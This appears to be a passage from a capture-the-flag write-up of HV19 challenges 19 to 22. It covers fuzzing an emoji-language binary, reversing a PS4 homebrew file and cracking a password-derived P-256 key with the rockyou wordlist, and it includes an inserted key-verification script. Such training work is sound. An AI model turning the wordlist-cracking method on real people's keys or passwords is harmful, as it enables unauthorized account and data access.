This means that this is the one that caused the program to terminate.\n<br\/>\n<br\/>When providing an input to the program, which can be done by simply entering it beneath the <code>Input<\/code> section, the chicken is not displayed anymore:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_02_nochicken.png\" \/>\n<br\/>\n<br\/>This means we passed the first panic sequence. Obviously this part of the code checks whether there is any input at all.\n<br\/>\n<br\/>Now let's move the chicken to the second panic sequence in order to determine whether this is the one that terminates the program now:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_03_chicken.png\" \/>\n<br\/>\n<br\/>Now we can see that the chicken is displayed again. This means we hit the second panic sequence.\n<br\/>\n<br\/>When reviewing the indented code again, we can see that this second panic sequence is nested in a loop (&#128258;):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    &#128258; &#8984; &#127381;&#9193;&#9193; &#128020;&#127848; &#127814;&#10071;&#65039;&#128020;&#127324;&#10071;&#65039;&#10071;&#65039; &#127815;\n      &#128061;&#12983; &#128061;&#127324; &#8984;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; &#8963;\n      &#128061;&#127292; &#8984; &#128686; &#128020;&#127292;&#10071;&#65039;&#10071;&#65039; &#10145;&#65039; ^\n      &#128167; &#127866;&#8963; &#10134; &#128020;&#12883;&#10071;&#65039; &#10135; &#128020;&#127848; &#128078; &#128077; &#127814;&#10071;&#65039;&#10071;&#65039; &#10060; ^ &#10060; &#128167;&#8984;&#10071;&#65039; &#10145;&#65039; &#9096;\n      &#8618;&#65039; &#8984; &#9664; &#128020;&#127356;&#10071;&#65039; &#129309; &#10062; &#127866;&#128061;&#12983; &#128061;&#127356; &#8984;&#10071;&#65039;&#10071;&#65039; &#10134; &#129308;&#128020;&#127324;&#10071;&#65039; &#10133; &#128020;&#127324;&#10071;&#65039; &#10134; &#128020;&#127292;&#10071;&#65039; &#10134; &#128020;&#127356;&#10071;&#65039; &#10133; &#128020;&#127848; &#128077; &#127814;&#10071;&#65039;&#129307; &#10006; &#128020;&#127848; &#128078; &#128078; &#128078; &#127814;&#10071;&#65039; &#128588; &#128290;&#9096;&#10071;&#65039;&#10071;&#65039; &#127815;\n        &#129327;&#128007;&#128187; &#128292;&#128078;&#128292;&#10071;&#65039;\n      &#127817;\n...<\/pre>\n<br\/>We can assume that this loop iterates over our input. In order to determine how often the loop iterates, let's move the output to the beginning of the loop body: \n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_04_patch.png\" \/>\n<br\/>\n<br\/>My hope was that the program checks the input gradually within the loop, so that we can fuzz it byte by byte. If the beginning of our input matches, the loop should not terminate (panic sequence) but make another iteration. We could recognize this by the number of chickens displayed before the termination. Unfortunately, the first fuzzing attempts (fuzzing 1 and 2 bytes) did not even lead to a second loop iteration. Thus I tried to enter a unicode smiley as the input:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/19_05_morechicken.png\" \/>\n<br\/>\n<br\/>Now the loop actually did three iterations! Seems we are on the right track. 
So let's fuzz the program with unicode:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom pwn import *\ncontext.log_level = 21 # disable pwntools logging\n\n# start at code point U+1F000 and walk upwards (runs until interrupted)\nutf32 = 0x0001f000\n\nwhile True:\n  # one UTF-8 encoded code point per run of the patched binary (Python 2: unichr)\n  u = unichr(utf32).encode('utf-8')\n  io = process('.\/loop_fuzz')\n  io.sendline(u)\n  r = io.recv(1000)\n  # the number of output lines grows with the number of loop iterations (chickens)\n  print(str(len(r.split('\\n'))) + ' ('+u.encode('hex')+')')\n  io.close()\n  utf32 += 1<\/pre>\n<br\/>The script starts at the code point <code>0x0001f000<\/code>, sends the unicode character UTF-8-encoded to the program using <a href=\"http:\/\/docs.pwntools.com\/en\/stable\/#\" rel=\"noopener noreferrer\" target=\"_blank\">pwntools<\/a> and displays the number of lines printed by the program. This way we can determine which unicode character produces the highest number of loop iterations:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# .\/fuzz_unicode.py | tee fuzz_out.txt\n6 (f09f8080)\n6 (f09f8081)\n6 (f09f8082)\n6 (f09f8083)\n6 (f09f8084)\n6 (f09f8085)\n6 (f09f8086)\n6 (f09f8087)\n...<\/pre>\n<br\/>One unicode character produces an output of 29 lines:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# cat fuzz_out.txt | sort -rn | head\n29 (f09f9491)\n7 (f09f94bf)\n7 (f09f94be)\n7 (f09f94bd)\n7 (f09f94bc)\n7 (f09f94bb)\n7 (f09f94ba)\n7 (f09f94b9)\n7 (f09f94b8)\n7 (f09f94b7)<\/pre>\n<br\/>Wonder what this unicode character is?\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# python -c 'print(\"f09f9491\".decode(\"hex\"))'\n&#128273;\n<\/pre>\n<br\/>Well. This makes sense. 
Let's see the full output of the program when entering the key:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# .\/day19 \n &#128274; &#10145;&#65039; &#127877;&#127995;&#8265;&#65039; &#10145;&#65039; &#127876;&#128681; \n&#128273;\nHV19{*&lt;|:-)____\\o\/____;-D}\n<\/pre>\n<br\/>In retrospect we could have guessed this, but this way it was much more fun \ud83d\ude42\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{*<|:-)____\\o\/____;-D}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.20\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.20 - i&nbsp;want&nbsp;to&nbsp;play&nbsp;a&nbsp;game<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_20.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa was spying on you on Discord and saw that you want something weird and obscure to reverse?\n<br\/>\n<br\/>your wish is my command.\n<br\/>\n<br\/><span class=\"link\">HV19-game.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains an <code>amd64 COFF<\/code> binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/20# unzip e22163c8-e0a4-475b-aef5-6a8aba51fd93.zip \nArchive:  e22163c8-e0a4-475b-aef5-6a8aba51fd93.zip\n  inflating: game                    \nroot@kali:~\/hv19\/20# file game \ngame: Intel amd64 COFF object file, no line number info, not stripped, 26 sections, symbol offset=0xb50, 99 symbols\n<\/pre>\n<br\/>Before analyzing the binary, it's usually worth running <code>strings<\/code> on the file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/20# strings 
game \n.text\nP`.data\n.bss\n.rdata\nP@\/4\n...\nsendflag\nD$'H\nD$BH\n[A\\A]A^A_]\n*+^{9\nlibkernel.sprx\nsceKernelGetIdPs\nsceKernelGetOpenPsIdForSystem\n\/mnt\/usb0\/PS4UPDATE.PUP\n%02x\nf86d4f9d2c049547bd61f942151ffb55\nGCC: (GNU) 7.4.0\n...<\/pre>\n<br\/>There are a few interesting strings. <code>sendflag<\/code> seems juicy for obvious reasons. The string <code>\/mnt\/usb0\/PS4UPDATE.PUP<\/code> in combination with the architecture of the binary indicates that this is a PlayStation 4 binary. The string <code>f86d4f9d2c049547bd61f942151ffb55<\/code> seems to be an MD5 hash. When googling the value, we find <a href=\"https:\/\/lania.co\/ps4_505.html\" rel=\"noopener noreferrer\" target=\"_blank\">this page<\/a>, which provides a PS4 firmware (<code>505Retail.PUP<\/code>). The MD5 hash of the firmware image is exactly <code>f86d4f9d2c049547bd61f942151ffb55<\/code>.\n<br\/>\n<br\/>With this background knowledge, let's have a look at the binary using <code>ghidra<\/code>. There is only a single function called <code>_main<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/20_01_ghidra.png\" width=\"900px\"\/>\n<br\/>\n<br\/>At the beginning of the function a few initialization functions are called. After this, a file is opened in order to calculate its MD5 hash using the functions <code>MD5Init<\/code>, <code>MD5Update<\/code> and <code>MD5Final<\/code>. The reference to the filename being opened does not seem to be decompiled correctly by ghidra. However, we have already seen the filename <code>\/mnt\/usb0\/PS4UPDATE.PUP<\/code> within the binary. After calculating the MD5 hash, the hash is stored in a string using <code>sprintf<\/code>. This string is then compared to a static string using <code>strcmp<\/code>. 
Again we notice that the reference doesn't seem to be correct, but we can make the quite obvious assumption that the hash is compared to the MD5 hash we already found: <code>f86d4f9d2c049547bd61f942151ffb55<\/code>. The execution only continues if the MD5 hash of the file matches this hash. This means that the file in question is actually the PS4 firmware we found previously (<code>505Retail.PUP<\/code>). Let's further inspect the decompilation:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/20_02_ghidra2.png\" width=\"900px\"\/>\n<br\/>\n<br\/>If the hash matches, <code>0x1a<\/code> bytes are copied from a static location to a stack buffer. By inspecting the <code>.rdata_3<\/code> section of the binary using <code>radare2<\/code>, we can see the already referenced values (filename, format string and MD5 hash) and an additional 0x1a bytes at the beginning of the section. These are obviously the bytes that are copied to the stack buffer:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">[0x00000439]&gt; iS\n[Sections]\nNm Paddr       Size Vaddr      Memsz Perms Name\n00 0x00000424   752 0x00000424   752 -r-x .text_0\n01 0x00000000     0 0x00000000     0 -rw- .data_1\n02 0x00000000     0 0x00000000     0 -rw- .bss_2\n03 0x00000714   176 0x00000714   176 -r-- .rdata_3\n...\n\n[0x00000439]&gt; px 300 @ 0x00000714\n- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF\n0x00000714  ce55 954e 38c5 89a5 1b6f 5e25 d21d 2a2b  .U.N8....o^%..*+\n0x00000724  5e7b 3914 8ed0 f0f8 f8a5 006c 6962 6b65  ^{9........libke\n0x00000734  726e 656c 2e73 7072 7800 7363 654b 6572  rnel.sprx.sceKer\n0x00000744  6e65 6c47 6574 4964 5073 0073 6365 4b65  nelGetIdPs.sceKe\n0x00000754  726e 656c 4765 744f 7065 6e50 7349 6446  rnelGetOpenPsIdF\n0x00000764  6f72 5379 7374 656d 0072 6200 2f6d 6e74  orSystem.rb.\/mnt\n0x00000774  2f75 7362 302f 5053 3455 5044 4154 452e  \/usb0\/PS4UPDATE.\n0x00000784  5055 5000 2530 3278 0000 0000 0000 0000  PUP.%02x........\n0x00000794  6638 3664 3466 3964 3263 3034 3935 3437  f86d4f9d2c049547\n0x000007a4  6264 3631 6639 3432 3135 3166 6662 3535  bd61f942151ffb55\n0x000007b4  0000 0000 0000 0000 0000 0000 0000 0000  ................\n0x000007c4  4743 433a 2028 474e 5529 2037 2e34 2e30  GCC: (GNU) 7.4.0\n0x000007d4  0000 0000 0000 0000 0000 0000 0000 0000  ................\n...<\/pre>\n<br\/>Further following the decompiled output in ghidra, we can see that a variable (<code>lVar8<\/code>) is initialized with the value <code>0x1337<\/code> and the same file as before is opened. After this, a loop is entered that sets the file position indicator to the value of <code>lVar8<\/code> using <code>fseek<\/code> and reads 0x1a bytes at this position. After this another loop is entered that iterates over the 0x1a bytes of the stack buffer, XORing every byte with the next byte read from the file. At the end of the outer loop, the value of <code>lVar8<\/code> is increased by <code>0x1337<\/code>. The outer loop terminates when the value reaches <code>0x1714908<\/code>. After this, the stack buffer seems to be sent over the network. 
Since we have enough information at this point, let's recreate the steps carried out by the code in python:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\n# read file content\nfile_content = open('505Retail.PUP').read()\n\n# 0x1a bytes from .rdata_3\nflag = list('ce55954e38c589a51b6f5e25d21d2a2b5e7b39148ed0f0f8f8a5'.decode('hex'))\n\nlVar8 = 0x1337\nwhile (lVar8 != 0x1714908):\n  for lVar9 in range(0x1a):\n    flag[lVar9] = chr(ord(flag[lVar9]) ^ ord(file_content[lVar8+lVar9]))\n  lVar8 += 0x1337\n\nflag = ''.join(flag)\nprint(flag)<\/pre>\n<br\/>Running the script prints the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/20# .\/rev.py \nHV19{C0nsole_H0mebr3w_FTW}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{C0nsole_H0mebr3w_FTW}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.21\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.21 - Happy&nbsp;Christmas&nbsp;256<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_21.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa has improved since the last Cryptmas and now he uses harder algorithms to secure the flag.\n<br\/>\n<br\/>This is his public key:\n<br\/><pre>X: 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f\n<br\/>Y: 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c\n<br\/><\/pre>To make sure this is safe, he used the NIST P-256 standard.\n<br\/>\n<br\/>But we are lucky and an Elve is our friend. 
We were able to gather some details from our whistleblower:\n<br\/><ul><li>Santa used a password and SHA256 for the private key (d)<\/li><li>His password was leaked 10 years ago<\/li><li>The password length is the square root of 256<\/li><li>The flag is encrypted with AES256<\/li><li>The key for AES is derived with pbkdf2_hmac, salt: \"TwoHundredFiftySix\", iterations: 256*256*256<\/li><\/ul>\n<br\/>Phew - Santa seems to know his business - or can you still recover this flag?\n<br\/><pre>Hy97Xwv97vpwGn21finVvZj5pK\/BvBjscf6vffm1po0=<\/pre><\/td><\/tr><\/tbody><\/table>\n<br\/>We can follow the description line by line to recover the flag.\n<br\/>\n<br\/>The first information we get is the following:\n<br\/><ul><li>NIST P-256<\/li><li>X: 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f<\/li><li>Y: 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c<\/li><\/ul>Accordingly, NIST P-256 with the above-mentioned public key was used. We don't know the private key (<code>d<\/code>) yet:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">from Crypto.PublicKey import ECC\n\nx = 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f\ny = 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c\nd = ???\nECC.construct(curve='NIST P-256',point_x=x,point_y=y,d=d)\n<\/pre>\n<br\/>The next piece of information concerns the unknown private key (<code>d<\/code>):\n<br\/><ul><li>Santa used a password and SHA256 for the private key (d)<\/li><li>His password was leaked 10 years ago<\/li><li>The password length is the square root of 256<\/li><\/ul>The mentioned leak is probably the famous <code>rockyou.txt<\/code>. This is narrowed down by stating that the length of the password is the square root of 256 = 16. 
This password has been hashed using <code>SHA256<\/code>, which was then used as the private key <code>d<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">import hashlib\n\nwl = '\/usr\/share\/wordlists\/rockyou.txt'\nwords = open(wl).read().split('\\n')\n\nfor word in words:\n  if (len(word) != 16): continue\n  m_sha256 = hashlib.sha256()\n  m_sha256.update(word)\n  d = int(m_sha256.hexdigest(), 16)\n<\/pre>\n<br\/>At this point we already have enough information to recover the password. Surely there are a lot of passwords with the length 16 in the <code>rockyou.txt<\/code>, but the construction of the ECC key will only succeed if the public key (<code>x<\/code> and <code>y<\/code>) matches the private key (<code>d<\/code>). This means if the ECC key can be constructed successfully, we have found the correct private key \/ password.\n<br\/>\n<br\/>The last information the description contains is the following:\n<br\/><ul><li>The flag is encrypted with AES256<\/li><li>The key for AES is derived with pbkdf2_hmac, salt: \"TwoHundredFiftySix\", iterations: 256*256*256<\/li><li>Encrypted flag: Hy97Xwv97vpwGn21finVvZj5pK\/BvBjscf6vffm1po0=<\/li><\/ul>Accordingly we only have to calculate the <code>pbkdf2_hmac<\/code> with the above mentioned settings. 
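As an added example (not the author's script), here is the check that ECC.construct() performs implicitly, written out in pure Python so it runs without PyCryptodome: hash the candidate password with SHA-256, use the digest as the scalar d, multiply the P-256 base point and compare the result with the leaked public point. The curve constants are the standard P-256 parameters; the public point and the password are the values from the challenge. It also makes the weakness visible: a password-derived private key is only as strong as the password, so the key space collapses from the curve order to the wordlist.

```python
#!/usr/bin/env python3
"""Verify a password-derived NIST P-256 private key against a public point.

Added example, not the writeup's own script: pure-Python double-and-add on
P-256 so the check runs without PyCryptodome. The public point and the
password are the values from the challenge; everything else is standard
P-256 (FIPS 186-4).
"""
import hashlib

# NIST P-256 domain parameters
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

# Santa's public key, taken from the challenge text
PUB_X = 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f
PUB_Y = 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c


def on_curve(pt):
    """True if pt = (x, y) satisfies y^2 = x^3 + ax + b (mod p)."""
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine point addition; None stands for the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:          # p1 == -p2, the sum is infinity
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P   # tangent: doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P          # chord: addition
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point):
    """k * point by right-to-left double-and-add (not constant time)."""
    result = None
    while k:
        if k & 1:
            result = point_add(result, point)
        point = point_add(point, point)
        k >>= 1
    return result


def password_to_scalar(password):
    """The challenge's key derivation: d = SHA-256(password) as an integer."""
    return int.from_bytes(hashlib.sha256(password.encode()).digest(), "big")


def matches_public_key(password, pub_x, pub_y):
    """Does SHA-256(password), used as d, produce the public point (pub_x, pub_y)?

    This is the consistency check ECC.construct() runs when it is given both
    d and the point; here a mismatch returns False instead of raising.
    """
    d = password_to_scalar(password)
    if not 1 <= d < N:                  # not a valid private scalar
        return False
    return scalar_mult(d, G) == (pub_x, pub_y)


def main():
    for candidate in ("wrongpassword123", "santacomesatxmas"):
        print(f"{candidate}: {matches_public_key(candidate, PUB_X, PUB_Y)}")


if __name__ == "__main__":
    main()
```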
The result is an AES key, which can be used to decrypt the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">aes_key = hashlib.pbkdf2_hmac('sha256', word, 'TwoHundredFiftySix', 256*256*256)\ncipher = AES.new(aes_key, AES.MODE_ECB)\nflag = cipher.decrypt(flag_encr)<\/pre>\n<br\/>Summing this all up in a full script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom Crypto.PublicKey import ECC\nfrom Crypto.Cipher import AES\nimport hashlib\n\nwl = '\/usr\/share\/wordlists\/rockyou.txt'\nwords = open(wl).read().split('\\n')\nflag_encr = 'Hy97Xwv97vpwGn21finVvZj5pK\/BvBjscf6vffm1po0='.decode('base64')\nx = 0xc58966d17da18c7f019c881e187c608fcb5010ef36fba4a199e7b382a088072f\ny = 0xd91b949eaf992c464d3e0d09c45b173b121d53097a9d47c25220c0b4beb943c\n\nfor word in words:\n  if (len(word) != 16): continue\n  try:\n    m_sha256 = hashlib.sha256()\n    m_sha256.update(word)\n    d = int(m_sha256.hexdigest(), 16)\n    ECC.construct(curve='NIST P-256',point_x=x,point_y=y,d=d)\n  except: continue\n  print('got password: ' + word)\n  print('calculating AES key ...')\n  aes_key = hashlib.pbkdf2_hmac('sha256', word, 'TwoHundredFiftySix', 256*256*256)\n  print('AES key: ' + aes_key.encode('hex'))\n  cipher = AES.new(aes_key, AES.MODE_ECB)\n  flag = cipher.decrypt(flag_encr)\n  print(flag)\n  quit()<\/pre>\n<br\/>Running it yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/21# .\/craxxor.py\ngot password: santacomesatxmas\ncalculating AES key ...\nAES key: eb1e0442ca6566e5d687740d246caea6db3b2851f774140d153c848d59515705\nHV19{sry_n0_crypt0mat_th1s_year}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{sry_n0_crypt0mat_th1s_year}<\/span>.\n<br\/><br\/>\n<hr 
id=\"chlgHV19.22\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.22 - The&nbsp;command&nbsp;...&nbsp;is&nbsp;lost<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_22.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">Santa bought this gadget when it was released in 2010. He did his own DIY project to control his sledge by serial communication over IR. Unfortunately Santa lost the source code for it and doesn't remember the command needed to send to the sledge. The only thing left is this file: <span class=\"link\">thecommand7.data<\/span>\n<br\/>\n<br\/>Santa likes to start a new DIY project with more commands in January, but first he needs to know the old command. So, now it's on you to help out Santa.<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided file is an <a href=\"https:\/\/en.wikipedia.org\/wiki\/Intel_HEX\" rel=\"noopener noreferrer\" target=\"_blank\">Intel HEX file<\/a> for an Arduino:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/22# cat 
f.txt\n:100000000C9435000C945D000C945D000C945D0024\n:100010000C945D000C945D000C945D000C945D00EC\n:100020000C945D000C945D000C945D000C945D00DC\n:100030000C945D000C945D000C945D000C945D00CC\n:100040000C94EA010C945D000C945A020C94340256\n:100050000C945D000C945D000C945D000C945D00AC\n:100060000C945D000C945D00A60311241FBECFEF1D\n:10007000D8E0DEBFCDBF11E0A0E0B1E0EEE9F8E0EE\n:1000800002C005900D92A835B107D9F721E0A8E587\n:10009000B1E001C01D92AE3FB207E1F710E0C5E349\n:1000A000D0E004C02197FE010E944704C433D10769\n:1000B000C9F70E94D3030C944D040C9400000F93D5\n:1000C0001F93CF93DF93EC01E881F9810190F081D8\n:1000D000E02D09958C01E881F9810280F381E02D02\n:1000E00042E050E065E571E0CE010995800F911F77\n:1000F000DF91CF911F910F910895AF92BF92CF9250\n:10010000DF92EF92FF920F931F93CF93DF936C01D7\n:100110007B018B01040F151FEB015E01AE18BF08B8\n:10012000C017D10759F06991D601ED91FC9101906A\n:10013000F081E02DC6010995892B79F7C501DF9182\n:10014000CF911F910F91FF90EF90DF90CF90BF90D4\n:10015000AF900895FC01538D448D252F30E0842FFE\n:1001600090E0821B930B541710F0CF9608950197DF\n:100170000895FC01918D828D981761F0A28DAE0FCC\n:10018000BF2FB11D5D968C91928D9F5F9F73928F53\n:1001900090E008958FEF9FEF0895FC01918D828D7F\n:1001A000981731F0828DE80FF11D858D90E008954C\n:1001B0008FEF9FEF0895FC01918D228D892F90E0A4\n:1001C000805C9F4F821B91098F739927089588E562\n:1001D00091E00E94DB0021E0892B09F420E0822FCE\n:1001E000089580E090E0892B29F00E94E7008111BA\n:1001F0000C9400000895FC01A48DA80FB92FB11D27\n:10020000A35ABF4F2C91848D90E001968F7399274C\n:10021000848FA689B7892C93A089B1898C9183702A\n:1002200080648C93938D848D981306C00288F38923\n:10023000E02D80818F7D80830895EF92FF920F9350\n:100240001F93CF93DF93EC0181E0888F9B8D8C8D82\n:1002500098131AC0E889F989808185FF15C09FB776\n:10026000F894EE89FF896083E889F9898081837039\n:10027000806480839FBF81E090E0DF91CF911F91E8\n:100280000F91FF90EF900895F62E0B8D10E00F5F09\n:100290001F4F0F731127E02E8C8D8E110CC00FB6DF\n:1002A00007FCFACFE889F989808185FFF5CFCE0177\n:1002B0000E94FB00F1CFEB8DEC0FFD2FF11DE35AF7\n:1002C000FF4F
F0829FB7F8940B8FEA89FB898081FA\n:1002D0008062CFCFCF93DF93EC01888D8823B9F074\n:1002E000AA89BB89E889F9898C9185FD03C0808141\n:1002F00086FD0DC00FB607FCF7CF8C9185FFF2CFBE\n:10030000808185FFEDCFCE010E94FB00E9CFDF9118\n:10031000CF910895CF92DF92EF92FF92CF93DF9328\n:10032000EC016A017B01E889F98982E08083C114CC\n:1003300081EED806E104F104A1F060E079E08DE3FC\n:1003400090E0A70196010E9425042150310941093E\n:1003500051095695479537952795211580E138071E\n:1003600098F0E889F989108260E874E88EE190E0FD\n:10037000A70196010E942504215031094109510924\n:100380005695479537952795EC85FD853083EE8505\n:10039000FF852083188EEC89FD8986E08083EA89B9\n:1003A000FB89808180618083EA89FB898081886004\n:1003B0008083EA89FB89808180688083EA89FB8960\n:1003C00080818F7D8083DF91CF91FF90EF90DF90D0\n:1003D000CF9008951F920F920FB60F9211242F9372\n:1003E0003F938F939F93AF93BF938091FA01909126\n:1003F000FB01A091FC01B091FD013091F90123E0D6\n:10040000230F2D3758F50196A11DB11D2093F90139\n:100410008093FA019093FB01A093FC01B093FD013E\n:100420008091F5019091F601A091F701B091F8014A\n:100430000196A11DB11D8093F5019093F601A09343\n:10044000F701B093F801BF91AF919F918F913F91C8\n:100450002F910F900FBE0F901F90189526E8230F35\n:100460000296A11DB11DD2CF1F920F920FB60F920F\n:1004700011242F933F934F935F936F937F938F93A9\n:100480009F93AF93BF93EF93FF9388E591E00E9412\n:10049000FB00FF91EF91BF91AF919F918F917F9161\n:1004A0006F915F914F913F912F910F900FBE0F90E1\n:1004B0001F9018951F920F920FB60F9211242F9331\n:1004C0008F939F93EF93FF93E0916801F0916901FF\n:1004D0008081E0916E01F0916F0182FD1BC09081DF\n:1004E000809171018F5F8F7320917201821741F0AB\n:1004F000E0917101F0E0E85AFE4F958F8093710111\n:10050000FF91EF919F918F912F910F900FBE0F90C0\n:100510001F9018958081F4CFCF93DF9300D000D047\n:10052000CDB7DEB789E290E0FC018081882F90E0B2\n:10053000807899279C838B838B819C81892BB9F44C\n:100540001A82198289819A818C9788F489819A818B\n:10055000895E9E4FFC018081682F88E591E00E94B2\n:100560005F0089819A8101969A838983EBCF0F90EE\n:100570000F900F900F90DF91CF910895CF93DF935D\n:10058000CDB7DEB78091020180933401
80911401D0\n:1005900080931B018091110180932A0180910201B7\n:1005A000809325018091000180933C01809102019C\n:1005B000809322018091130180931E01809112018A\n:1005C000809338018091100180933D01DF91CF919C\n:1005D0000895CF93DF93CDB7DEB78091020180936A\n:1005E0002D01809102018093280180911101809357\n:1005F000390180910F0180933E0180910901809320\n:100600003B018091070180933A0180910D01809315\n:10061000210180910701809331018091070180932E\n:100620002E0180910A018093230180910301809320\n:100630001A01DF91CF910895CF93DF93CDB7DEB745\n:100640008091020180933F018091060180931801FF\n:10065000809110018093400180910B0180932401CF\n:1006600080910E01809327018091080180932F01D2\n:100670008091150180934101809111018093300197\n:100680008091070180931F018091020180933701BF\n:1006900080910F018093360180910201809329019E\n:1006A000DF91CF910895CF93DF93CDB7DEB78091DF\n:1006B0000E0180932C018091070180932601809187\n:1006C000040180931C0180910101809319018091A4\n:1006D0000701809335018091040180931701809177\n:1006E00005018093200180910C018093330180915A\n:1006F000070180932B018091020180931D0180915D\n:10070000110180933201DF91CF910895CF93DF9350\n:10071000CDB7DEB70E9453030E941C030E94E9027A\n:100720000E94BE02DF91CF910895CF93DF93CDB7A2\n:10073000DEB74CE251E060E070E088E591E00E94B5\n:100740008A010E948603DF91CF910895E8E5F1E0E8\n:100750001382128288EE93E0A0E0B0E08483958358\n:10076000A683B78387E491E09183808385EC90E052\n:100770009587848784EC90E09787868780EC90E06B\n:10078000918B808B81EC90E0938B828B82EC90E05C\n:10079000958B848B86EC90E0978B868B118E128ED6\n:1007A000138E148E08957894